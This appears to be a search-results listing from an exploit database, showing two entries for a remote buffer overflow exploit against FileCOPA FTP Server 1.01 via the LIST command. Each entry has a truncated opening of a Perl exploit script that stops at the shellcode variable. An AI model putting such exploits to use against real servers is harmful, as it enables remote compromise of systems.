2 matches found
FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl -w bad char 0x00 0x0a tested on win00 SP4 English on filecopa ftp server 6/4/2006 version use Net::FTP; $target = $ARGV0 || die usage:$0 target port; my $user = test; my $pass = test; $shellcode =...
FileCOPA FTP Server 1.01 - LIST Remote Buffer Overflow (1)
FileCOPA FTP Server 1.01 - LIST Remote Buffer Overflow 1 !/usr/bin/perl -w bad char 0x00 0x0a tested on win00 SP4 English on filecopa ftp server 6/4/2006 version use Net::FTP; $target = $ARGV0 || die "usage:$0 "; my $user = "test"; my $pass = "test"; $shellcode =...